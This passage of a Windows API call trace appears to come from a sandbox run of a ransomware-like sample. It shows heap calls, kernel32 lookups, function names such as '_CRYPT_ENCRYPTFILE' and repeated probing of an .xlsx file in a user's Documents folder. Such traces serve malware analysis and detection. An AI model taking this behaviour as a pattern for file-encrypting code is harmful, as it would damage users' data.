hHeap=0x8a0000) returned 1 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.997] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.998] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0175.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0175.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.998] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0175.999] CloseHandle (hObject=0x138) returned 1 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0176.000] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0176.000] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0176.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0176.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0176.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0176.001] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0176.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0176.001] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0176.001] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0176.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.001] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0176.001] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0176.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.001] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.001] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.001] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.001] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0x2088d820, ftLastWriteTime.dwHighDateTime=0x1d58a7a, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 0x90add8 [0176.003] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.003] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0x2088d820, ftLastWriteTime.dwHighDateTime=0x1d58a7a, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 0x90add8 [0176.004] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.004] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sHJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HJNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JNd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nd6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZQQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QQ8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q8NT.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.006] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.006] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0176.006] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0176.006] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.006] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.007] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.007] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.007] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.007] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.007] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", lpFindFileData=0x87edb8 | out: 